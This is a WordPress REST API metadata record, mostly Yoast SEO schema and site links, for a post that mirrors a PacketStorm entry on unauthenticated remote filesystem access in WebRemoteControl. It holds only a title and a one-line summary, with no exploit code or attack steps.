class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59350#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59350\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526\",\"datePublished\":\"2026-06-02T13:39:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59350\"},\"wordCount\":2609,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=59350#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59350\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59350\",\"name\":\"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-02T13:39:26+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59350#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=59350\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=59350#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=59350","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-06-02T18:25:51&#8243;,&#8221;description&#8221;:&#8221;Proof of concept tool that demonstrates how WebRemoteControl suffers from unauthenticated remote filesystem access and potential remote code execution&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:222526&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;==================================================================================================================================n |...","og_url":"https:\/\/zero.redgem.net\/?p=59350","og_site_name":"zero redgem","article_published_time":"2026-06-02T13:39:26+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=59350#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=59350"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526","datePublished":"2026-06-02T13:39:26+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=59350"},"wordCount":2609,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=59350#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=59350","url":"https:\/\/zero.redgem.net\/?p=59350","name":"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-02T13:39:26+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=59350#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=59350"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=59350#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 WebRemoteControl Unauthenticated Remote Filesystem Access_PACKETSTORM:222526"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/59350","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=59350"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/59350\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=59350"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=59350"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=59350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}